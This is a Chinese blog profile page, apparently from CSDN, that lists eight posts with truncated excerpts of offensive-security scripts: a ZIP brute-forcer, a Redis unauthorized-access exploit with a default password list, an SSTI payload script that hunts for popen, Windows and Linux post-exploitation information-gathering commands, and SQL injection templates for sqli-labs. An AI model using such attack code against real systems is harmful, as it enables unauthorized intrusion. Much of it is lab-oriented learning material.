- 博客(8)
- 收藏
- 关注
原创 PYTHON爬虫小工具
文章目录google headers格式转换firefox headers格式转换判断服务器检测哪些headers头判断服务器检测哪些cookies值google headers格式转换def googleHeadersFormat(headers): ''' google headers格式转换 :param headers: :return:header_dict ''' header_dict = {} for header in head
2021-11-21 22:38:04
454
原创 ZIP暴力破解脚本[多线程]
payloadimport zipfileimport sysimport tkinter as tkimport threadingimport queueclass BRUTE_ZIP(object): def __init__(self): self.flag=False # 用来判断是否在字典中找到密码,找到标记成True self.q=queue.Queue() self.thread_list=[] w
2021-02-15 06:42:32
1480
1
原创 redis未授权漏洞利用脚本
#! /usr/bin/env python# _*_ coding:utf-8 _*_import socketimport sysimport osclass PAYLOAD(object): def __init__(self,ip,port,timeout): self.ip=ip self.port=port self.timeout=timeout self.PASSWORD_DIC=['redis','ro
2021-02-14 23:57:41
726
原创 SSTI利用脚本
import requestsheaders={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0'}def find_popen(url,payload): '发现popen在object中的位置' num=0 while True: try: payload1 = '{'+payload.form
2021-02-14 23:56:48
519
1
原创 windows信息收集自动化脚本
import os#!encoding=utf-8class information_collecting(object): def __init__(self): self.system_info_commands={'windows版本信息\n':'ver','windows系统信息\n':'systeminfo','wmic os list brief\n':'wmic os list brief'} self.process_info_command=
2021-02-14 23:55:12
922
2
原创 LINUX自动化信息收集脚本
#!/usr/bin/python3import os#!encoding=utf-8class information_collecting(object): def __init__(self): self.system_info_commands={'linux系统信息(uname -a)\n':'uname -a','linux系统信息(cat /etc/issue)\n':'cat /etc/issue','linux发行版本(cat /etc/*-release
2021-02-14 23:54:04
518
原创 python脚本模板(用于sqli-labs实验)
目录UNION联合注入 python脚本模板error报错注入 python脚本模板bool布尔注入 python脚本模板time延时盲注 python脚本模板UNION联合注入 python脚本模板import requestsimport threadingimport queuefrom lxml import etreeimport reNUM=5 #线程数LIST=[]headers = {'user-agent': 'Mozilla/5.0 (Windows NT 1
2021-02-13 10:14:26
544
1
原创 sql-labs自动化注入解题笔记(21-25a)
目录less-21,less-22 (基于base64编码的cookie注入)sqlmappython脚本less-23(过滤注释符# --的GET注入)思路手工注入测试代码【payload】payload结构sqlmappython脚本less-21,less-22 (基于base64编码的cookie注入)sqlmapheader.txtGET /sqli-labs/Less-21/index.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.
2021-02-10 22:09:17
767
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人